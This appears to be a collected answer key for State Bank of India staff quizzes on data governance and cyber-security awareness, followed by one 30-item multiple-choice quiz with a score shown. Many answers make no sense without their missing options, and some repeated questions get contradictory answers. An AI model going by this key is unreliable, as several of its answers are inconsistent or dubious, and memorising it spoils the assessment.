Q: Branch has sanctioned a Car loan to one of his staff, but the loan instalment was
not fed in HRMS. The staff paid the instalment through his account and informed the
BM that a SI has been registered for the same.
A: Recovery to staff loan should be through HRMS only, so recovery details in
HRMS needs to be updated

Q: What are the impacts of feeding incorrect date of birth of a customer in CBS
A: 1& 2

Q: If a car dealer asks us for a list of customers having existing car loans, to market
loans for new cars for us, shall we share the list?
A: Cannot be shared

Q: DQI Index has been included as one of the Key Responsibility Areas (KRAs) in
Career Development System (CDS)
A: TRUE

Q: Data quality is necessary to fulfil the needs of an organization in terms of
A: All of the above

Q: As per the Bank's approved “SOP on Data Sharing with External Agencies/ Third
Parties” which of the following is to be considered as “Third Party”
A: All the above are to be treated as Third Parties

Q: Data Quality Index (DQI) dashboard measures the Data Quality for-
A: CIFs & Loans

Q: Updated policies or SOPs on Data Governance can be accessed through?
A: >>SBI Times>>MIS Online >>SOPs>>DMO

Q: For personal communication, we can use our official email IDs
A: FALSE

Q: Restricted access to Data means:
A: Both 1 & 2

Q: While inputting temporary address of a customer in CBS, it should be taken care that
A: "From & To" date in the temporary screen needs to be filled in as declared by the
customer

Q: Some of the key Data Privacy initiatives include:
A: All of the above

Q: In the Data Infringement portal, unattended infringements on Data Loss Prevention (DLP) may result in_____
A: Penal Score (1 to 4 marks) in RFIA of the Branch

Q: A staff can be held accountable for Data quality errors.
A: TRUE

Q: As per the Bank's approved “SOP on Data Sharing with External Agencies/ Third
Parties” which of the following is NOT to be considered as “Third Party”
A: Internal Auditors

Q: Customer sensitive Granular Data can be copied and stored without any approval
A: FALSE

Q: What are the two important pillars of the SOP on ‘Customer Sensitive Granular
Data Sharing and Access – Within Bank's Environment’:
A: Regulated & Limited access

Q: What are the different categories of Data Classification
A: SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC

Q: “Customer PII Data” is classified as ____________ Data
A: CONFIDENTIAL

Q: Impact of poor Data Quality on a Branch include ____
A: Both 1 & 2 above

Q: Which of the following is not one of the functions of an effective Data Loss
Prevention (DLP) program
A: Follow-up with Data users for Data Quality enhancement

Q: In an Account Opening Form, if Data has been provided by customer in non
mandatory field ( like mobile number /email ID ), what should be done while inputting
in CBS?
A: Input the Data exactly as given by the customer

Q: Sharing of customer sensitive granular Data is governed by which Policy :
A: Data Governance Policy

Q: Scope of Customer Sensitive Granular Data Sharing & Access Framework covers:
A: All of the above

Q: For official purpose, if we are required to share customer sensitive data, then we
should:
A: Delete the data after use

Q: Which one is NOT an approved way of sharing granular Data/access Data under
normal circumstances:
A: E-mail

Q: Salient features of Project Ganga include:
A: Customer One view

Q: What are the impacts of not verifying the pop-up name of PAN holder, while
fetching PAN details
A: 1& 2

Q: Incorrect spelling of Customer name comes under which one of the following Data
Quality Dimension?
A: Accuracy

Q: What is needed to create Data Quality Index?
A: Data quality rule and profiling results.

Q: Restricted access to Data means:
A: Both 1 & 2

Q: Some of the key Data Privacy initiatives include:
A: All of the above

Q: What are the impacts of feeding incorrect date of birth of a customer in CBS
A: 1& 2

Q: Can we store customer data on our Desktop ?
A: NO

Q: Objectives of Data Quality are:
i. Accuracy, validity
ii. timeliness, completeness
iii. uniqueness, consistency
A: All of the above

Q: A customer has submitted Voter Card as OVD, along with AOF. During the
scrutiny, it was found that the age of customer is less than 18
A: DOB on OVD and AOF, if same, then only account may be opened

Q: Capturing of incorrect CRA rating / ECR in a loan account may result in _____
A: Both 1 & 2

Q: Error categories in DQI for CIF related errors are:
A. Risk categorization
B. Personal Profile
C. PAN Related
D. Gender Related
E. Age Related
A: All of the Above

Q: Capturing of incorrect interest rate in loan accounts may result in ____________
A: All of the above

Q: Non capturing of PAN in CIF, even if furnished in the AOF, may result in ___
A: Both 1 & 2

Q: If a car dealer asks us for a list of customers having existing car loans, to market
loans for new cars for us, shall we share the list?
A: Cannot be shared

Q: While inputting temporary address of a customer in CBS, it should be taken care that
A: "From & To" date in the temporary screen needs to be filled in as declared by the
customer

Q: For personal communication, we can use our official email IDs
A: FALSE

Q: While verifying the pop-up name of PAN holder in CIF creation screen
A: 1 & 3

Q: The access to Customer Sensitive Granular Data to the users should be made
strictly on the basis of-
A: Both 1 & 2

Q: Which of the following is not a type of Data leak
A: Improper categorization of sensitive Data

Q: As per the Bank's approved “SOP on Data Sharing with External Agencies/ Third
Parties” which of the following is to be considered as “Third Party”
A: All the above are to be treated as Third Parties

Q: “SBI telephone directory” is classified as ____________ Data
A: INTERNAL

Q: What are the possible means by which Customer Sensitive Granular Data can get
divulged or leaked to any unrelated person / third party like vendors, dealers etc:
A: All of the above

DATA GOVERNANCE & CYBER SECURITY MODULE 3

Q: Which one of the following risks is not considered while evaluating a third party
vendor for risk assessment?
A: Market Risk

Q: _____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once such a connection is established then the attacker will be able to steal photos, messages and contacts etc.
A: Bluesnarfing

Q: Which one of the following statements is false?
A: Bulk SMS is sending SMS from mobile to many people.

Q: Non-repudiation is carried out through the services of authentication, authorization, confidentiality, and integrity. Confidentiality ensures which one of the following?
A: Secure encryption of the information

Q: Which one of the following is the leading illicit dark web marketplace which was
taken down by the FBI in what was considered then as a significant action on the Dark
web market?
A: Silk Road 2.0

Q: Which one of the following best describes a Man in the Middle (MITM) attack?
A: An attack used to monitor and potentially modify communications between two users

Q: Which of the following principles of the first of the CIA Triad Confidentiality is/are
Correct?
A: a, c and d

Q: Which of the following attacks is not categorised under Exploit based attacks?
A: Email hijacking

Q: Which of the following is not a stage in SIM swapping?
A: All the options above are stages of SIM Swapping

Q: What is the full form of MITB Attack?
A: Man in the Browser

Q: If you click on the padlock sign in the Address bar. Which of the following information
will be available to you?
A: You will get information on who owns the site and who has verified the site

Q: What is a “Collect Request” in a UPI transaction?
A: It is a feature available in BHIM SBI Pay

Q: Which one of the following is NOT a type of MITM attack?
A: DNS Spoofing

Q: Which one of the following statements is more appropriate in terms of Vendor risk
assessment?
A: Continuous assessment of Vendor security practices need to be done throughout the
Contract life cycle.

Q: The Cyber-attacks that originate through a third party vendor are also called ________?
A: Supply chain attacks

Q: How does the use of Virtual keyboard protect the customer?
A: It protects against Keylogger malware

Q: Which one of the following statements is FALSE about APT attacks?
A: APT attacks may be identified immediately as it shuts down the whole system

Q: _______ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?
A: Scareware

Q: Which of the following may not be the signs that the Mobile Phone (Android/iOS) is
hacked?
A: All statements are signs that the Mobile phone is hacked

Q: What makes SolarWinds attack an unusual hack?
A: The hackers through one malicious code in SolarWinds Orion software gained
access to thousands of other companies.

Q: Even if a user compromises his/her login credentials of OnlineSBI, no one can login
using this credential. What is the new security feature in OnlineSBI?
A: OTP has been made mandatory at the time of login

Q: Which of the following options is not to protect yourself from keyloggers?
A: Antivirus companies keep their records of the most common malware keyloggers and
will flag them as dangerous.

Q: Social Engineering Attacks does not include _____________
A: Denial of Service attack

Q: What is not true about myths associated with Cyber Risk?
A: Compliance and security are the same

Q: Which of the following best describes the Supply chain attack?
A: Supply chain attack occurs when hackers infiltrate systems through an outside
partner or provider who has access to the target systems and data

Q: What is Denial of Service Attacks?
A: It is a malicious attempt to disrupt the normal traffic of a targeted server, service or
network with a flood of Internet traffic from multiple computers at the same time

Q: While doing an ATM transaction, a customer is required to use a physical card provided to him by the Bank and also a PIN code to authenticate the transaction. This
practice ensures which of the following triad of Information Security?
A: Confidentiality

Q: Which of the following principles of the second of CIA Triad Integrity is/are Correct?
A: Use of a secure Hashing algorithm for the information ensures Integrity.

Q: What is Denial of Service Attacks?
A: It is an attack meant to shut down a machine or network, making it inaccessible to its intended users

Q: Which one of the following is a precaution to be taken while operating the ATM?
A: Check if any extra suspicious device is attached to the ATM machine.

Q: Which of the following is not a stage in SIM swapping?
A: All the options above are stages of SIM Swapping

Q: Select the correct statement about the impact of Cyber Risks.
A: All are true

Q: __________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?
A: Scareware

Q: Which of the following principles of the first of the CIA Triad Confidentiality is/are Correct?
A: a, b and d

Q: What is not true about SIM Swapping?
A: Fraudsters get access to the root of the mobile phone through SIM Swapping

Q: With the enhanced sharing of information over a global network for almost all life functions, which one of the following
A: Non-repudiation

Q: What is not true about myths associated with Cyber Risk?
A: IT team is alone not responsible for Cyber Security

Q: How does the use of Virtual keyboard protect the customer?
A: It protects against Keylogger malware

Q: Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what was
A: Silk Road 2.0

Q: The technique for sending SMS that appears to be initiated from the organization for KYC
updation, Account credit, Account
A: Spoofing

Q: The technique used to send the emails to all the employees of the Bank is known as
____________.
A: Spear Phishing

Q: The Cyber-attacks that originate through a third party vendor are also called ________?
A: Supply chain attacks

Q: What makes SolarWinds attack an unusual hack?


A: The hackers through one malicious code in the application of SolarWinds vendor’s application gained
access to Orion software

Q: Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is a
Sunday and Bank is closed.
A: Change the password

Q: Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential. What is the
A: OTP has been made mandatory at the time of login

Q: Which one of the following is NOT a type of MITM attack?
A: Logic Bomb

Q: Which of the following principles of the second of CIA Triad Integrity is/are Correct?
A: a, c and d

Q: Which of the following browsers allows access to the Network which is popular for implementing encrypted
routing
A: Tor

Q: The fraudster gets the personal details of the people through _______technique.
A: Social engineering

Q: Which of the following is not an example of data?
A: All are examples of data

Q: Which one is not an option for disabling UPI services?
A: YONO Main Screen UPI Enable/Disable UPI

Q: Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment. He
A: It should start with https://www.onlinesbi.com

Q: If you want to change the username and password for your SBI Internet banking, which of the following
statements is
A: You cannot change the Username but he/she can change the password at any time

Q: Which one of the following statements is false?
A: Bulk SMS is sending SMS from mobile to many people.

Q: A Cyber-Attack
A: option a & b

Q: _____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once
such a connection
A: Bluesnarfing

Q: Which one of the following statements is FALSE about APT attacks?
A: APT attacks may be identified immediately as it shuts down the whole system

Q: SBI internet banking site provides a facility to bypass such keylogger malware. Identify the feature.
A: Online Virtual Keyboard

DATA GOVERNANCE & CYBER SECURITY MODULE 4

Q: Method that is NOT suggested to prevent new account fraud.
A: Contact the bank immediately and ensure all the operating accounts are closed

Q: Can we create the password in other regional language (Other than English and
Hindi) in Retail Internet Banking?
A: You can use the multilingual image based virtual keyboard in Hindi or English
only.

Q: Which one of the following options is not a violation of acceptable usage policy?
A: Receiving mails from his batchmate

Q: Impact of Cyber risks are_________________
A: All of the above

Q: What is the “Time of detection of incident” for reporting the purpose of a cyber
incident to RBI, CERT-In & NCIIPC?
A: Time at which, the incident is brought to the knowledge of any official of AO,
including DGM & Module CISO

Q: Which of the following options is NOT a good wi-fi security practice?
A: You can use unsecure or open Wi-Fi for official purposes in case of emergency

Q: Pick the odd one.
A: Passwords should not be treated like signatures.

Q: Select the wrong statement.
A: It is not necessary to inform your organization always, if you come across any
discrepancies.

Q: As part of IS awareness and commemoration of Computer Security Day, SBI did NOT organize which one of the following activities?
A: Cold calling all the employees

Q: “Ransomware” can be spread through_____________?
A: Option 1 and 2

Q: Who can report cyber incidents to Information Security Department (ISD)?
A: Anyone who knows about cyber incidents including general public

Q: Which of the following statements is correct regarding creation of Profile password using the Multilingual Image based Virtual keyboard?
A: The Profile password should be a combination of alphabets (in the language
chosen), and numerals and special characters
A: The Profile password should be a combination of alphabets (in the language
chosen), and numerals and special characters

Q: Which of the following is NOT one of the best practices to maintain your
password?
A: Only difficult dictionary words should be used

Q: Customer reported an unauthorised UPI transaction of Rs.72,000/- in his account.
He reported the incident on the same day to the bank. The bank is not able to
establish customer negligence even after completion of 90 days from the date of
complaint. As per Limiting Liability of customer guidelines, how much amount does
the Bank need to pay to the customer in this situation?
A: Rs.72,000/-

Q: Select the wrong statement about the Acceptable usage policy (IS Policy) of our
Bank?
A: Successful backup of critical applications or data should be ensured yearly and to
be kept offsite.

Q: The time at which the cyber incident is brought to the knowledge of any official of
__________ shall be treated as time of detection of incident.
A: Information Security Dept. CC Mumbai

Q: Select the wrong statement about Desktop / Laptops /Workstations Usage?
A: Create a shortcut of a document/file instead of copying it on the desktop

Q: Cyber security incidents can be reported
A: by any employee or public

Q: Which of the following options is crucial in any UPI fraud related to Collect
request?
A: option a & b

Q: Which of the following options is NOT the best password security practices?
A: Change your password, only if you suspect it may have been exposed

Q: Which one of the following is the most important aspect for an organization as big
and global as SBI to protect itself from cyber security attacks and subsequent loss of
brand image?
A: A training awareness program that would provide education and guidance on a
range of information security topics to all the internal users of its systems and
applications.

Q: Which one of the following options does not substantiate the Acceptable Usage Policy of our Bank?
A: However, Mobile and laptop given to the staff for personal holding have exceptions to the policy.

Q: Which of the following statements is NOT correct in the WannaCry case?
A: The attackers collective called The Lazarus Group.

Q: Identify some of the risks involved in using public free WiFi.
A: All of the above statements are correct

Q: Websites use CAPTCHA to avoid password guessing by automated tools to prevent from
_______.
A: Dictionary Attack

Q: Which one of the following options is not a concern for password security?
A: In case of any breach in a Social Media Handle, delete your Social Media Account instead of
changing the password.

Q: Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC?
A: All of the above

Q: If a Bank always allows some of the employees to bring their own laptops, smart phones, tablets
etc. to office for office use
A: Bring Your Own Device

Q: Can we create the password in other regional language (Other than English and Hindi) in Retail
Internet Banking?
A: You can use the multilingual image based virtual keyboard in Hindi or English only.

Q: Pick the odd one.
A: Passwords should not be treated like signatures.

Q: Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank?
A: All are true

Q: Which of the following statements is not true about Acceptable usage policy (IS Policy) of our
Bank?
A: Employee’s mobile devices need not have Antivirus software

Q: What action will you take, when you are defrauded?
A: Lock the user access immediately

Q: The company asked their employees to use their own devices and internet access while
working from home. List some devices of the employees (iii) Asking the employees to use
enterprise VPN
A: Options (i) , (ii) and (iii) are necessary

Q: Which of the following options is NOT the best password security practices?
A: Change your password, only if you suspect it may have been exposed

Q: Which one of the following options is not considered as incident for reporting to RBI, NCIIPC
and CERT-In?
A: All of the above

Q: Which of the following statements is correct regarding creation of Profile password using the
Multilingual Image based
A: The Profile password should be a combination of alphabets (in the language chosen), and
numerals and special characters

Q: Which one of the following applications is not a threat to compromise confidentiality of the
data of portable devices?
A: Air watch agent

Q: What are the ways you can report an unauthorised transaction (ATM) without visiting the
branch?
A: Call dedicated number 1800 1111 09 also Can raise through https://crcf.sbi.co.in

Q: Which of the following steps would not be a part of the planning for Work from home?
A: Ensuring the physical access to the systems room is restricted and monitored

Q: Which one of the following options is NOT a violation of acceptable usage policy?
A: There was a data vulnerability due to lack of Anti-virus

Q: What are the timelines for reporting of cyber incidents to RBI and other Statutory Authorities
CERT-In & NCIIPC? Who
A: All cyber security incidents should be reported within 2 to 6 hours by Incident Response &
Management Team

Q: Which of the following options is an example of inappropriate use of the e-mail service?
A: Use of other officers' user ids or using a false identity.

Q: Cyber security incidents can be reported
A: by any employee or public

Q: Select the wrong statement.
A: For web security, verify the full URL by clicking the link, but do not give any personal/confidential
information
DATA GOVERNANCE QUIZ
https://sbiquiz.statebanktimes.in/dgq/

1. At the time of account opening, it was found that Educational Qualification was not mentioned by the customer in AOF, but it is a mandatory field in CBS
a. Teller should leave it blank as it has not been filled by customer
b. As it is mandatory in CBS, teller can fill any details as per his understanding
c. Teller should contact the customer and get the required details and then fill in CBS
d. 1 or 2

2. Customer sensitive Granular Data can be copied and stored without any approval
a. true
b. false

3. "Vendor pricing strategy" is classified as ____________ Data
a. SENSITIVE
b. CONFIDENTIAL
c. INTERNAL
d. PUBLIC

4. Capturing of incorrect security in secured loan accounts may result in _____________.
a. A/C outrightly classified as loss asset if security value is less than 10% of limit.
b. Incorrect Risk weight
c. Both 1 & 2
d. Neither 1 nor 2

5. "Customer salary, pay-slips" Transaction numbers and related Data "Customer (or families) Personal and Personally identifiable Data - Name, biometrics and consent" is classified as
a. SENSITIVE
b. CONFIDENTIAL
c. INTERNAL
d. PUBLIC

6. The access to Customer Sensitive Granular Data to the users should be made strictly on the basis of-
a. Need-To-Know
b. Need-To-Access
c. Both 1 & 2
d. Neither 1 nor 2

7. Data Management Office (DMO) is headed by
a. AGM (DMO)
b. CGM (DMO)
c. GM & CDMO
d. DMD & CIO

8. A staff can be held accountable for Data quality errors.
a. TRUE
b. FALSE

9. Capturing of incorrect / incomplete Data adversely affects:
a. Data Quality
b. Analytical Models
c. Both 1 & 2
d. Neither 1 nor 2

10. What are the impacts of not verifying the pop-up name of PAN holder, while fetching PAN details
a. PAN of any other person could be fed in the system
b. Feeding incorrect PAN details could lead to mis-match of TDS details of the customer
c. 1 & 2
d. No impact of not verifying the pop-up name of PAN holder, while fetching PAN details

11. What is/are the possible consequences of Data Leakage:
a. Financial loss
b. Reputational damage
c. Regulatory strictures
d. All the above

12. A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was found that the age of customer is less than 18
a. OVD can be accepted
b. DOB on OVD and AOF, if same, then only account may be opened
c. OVD has to be accepted, as it is a govt. document
d. if one can vote, he is not a minor. OVD should be accepted

13. DQI Index has been included as one of the Key Responsibility Areas (KRAs) in Career Development System (CDS)
a. TRUE
b. FALSE

14. Capturing of incorrect CRA rating / ECR in a loan account may result in ______.
a. Incorrect Interest Rate
b. Incorrect Risk weight
c. Both 1 & 2
d. Neither 1 nor 2

15. As per the Data Governance Policy, Data Governance Officer (DGO) needs to be nominated/designated at -
a. Circle
b. Administrative Office
c. RBO
d. All the above

16. Data Protection officer reports to ___ ?
a. GM & Chief Data Management Officer
b. CGM (Compliance)
c. CGM (R&DB Ops)
d. Chief Vigilance Officer

17. Prime objective of Data governance framework is to ensure-
a. Compliance with relevant legislation, regulatory requirements, policies, procedures and standards.
b. To define the roles and responsibilities for Data stakeholders, and to establish clear lines of accountability.
c. Effective assurance and control of Data management processes.
d. All of the above

18. To boost the housing loan business of the branch, list of HNIs can be shared with HLCs through:
a. Email
b. Physical copy
c. Not to be shared
d. Pen drive

19. Updated policies or SOPs on Data Governance can be accessed through (Give Four different paths of SBI times)
a. SBI Times>>Knowledge Hub>>SOPs>>DMO>>
b. SBI Times>>MIS Online>>SOPs>>DMO>>
c. SBI Times>>HR dashboard>>SOPs>>DMO>>
d. None of the above

20. Impact of poor Data Quality on a Branch include ____
a. Penal Score (1 to 3 marks) in RFIA for Project Ganga errors
b. Penal Score (1 to 3 marks) in RFIA for DQI errors
c. Either 1 or 2
d. Both 1 & 2 above

21. The best principles for improving Data Quality include(s)
a. Doing the things right at very first instance
b. Doing the right things every time
c. Either 1 or 2
d. Both 1 & 2 above

22. Data breach risk mitigation period for Medium category of Data breach is
a. 1 DAY
b. 2 DAYS
c. 5 DAYS
d. 7 DAYS

23. In ________________ Processing, small group of transactions are processed on demand
a. Batch
b. Real Time
c. Virtual Time
d. System

24. What are the main sources for low Data Quality?
a. Initial Data Conversion
b. Manual Data Entry
c. Batch Feed
d. All of the above

25. Sharing of Data with external agencies is governed by
a. SOP on Customer Sensitive Granular Data Sharing
b. SOP on Data Sharing with External agencies/third parties
c. SOP on Data Loss Prevention
d. SOP on Data Infringement

26. Data Governance Policy is applicable to all the domestic offices of SBI including:
a. all IT and IS assets
b. Data in motion, Data in use, Data at rest
c. all IT and IS processes
d. All of the above

27. "SBI telephone directory" is classified as ____________ Data
a. SENSITIVE
b. CONFIDENTIAL
c. INTERNAL
d. PUBLIC

28. In the Data Infringement portal, unattended infringements on Data Loss Prevention (DLP) may result in _____
a. Penal Score (5 marks) in RFIA of the Branch
b. Penal Score (10 marks) in RFIA of the Branch
c. Penal Score (1 to 4 marks) in RFIA of the Branch
d. No impact on Branch RFIA score

29. Objectives of Data Quality are: i. Accuracy, validity ii. timeliness, completeness iii. uniqueness, consistency
a. i & ii only
b. i, ii & iii
c. i only
d. None of above

30. "Vendor analysis reports" is classified as ____________ Data
a. SENSITIVE
b. CONFIDENTIAL
c. INTERNAL
d. PUBLIC

Thank You For Your Participation

Your Score is : 24/30
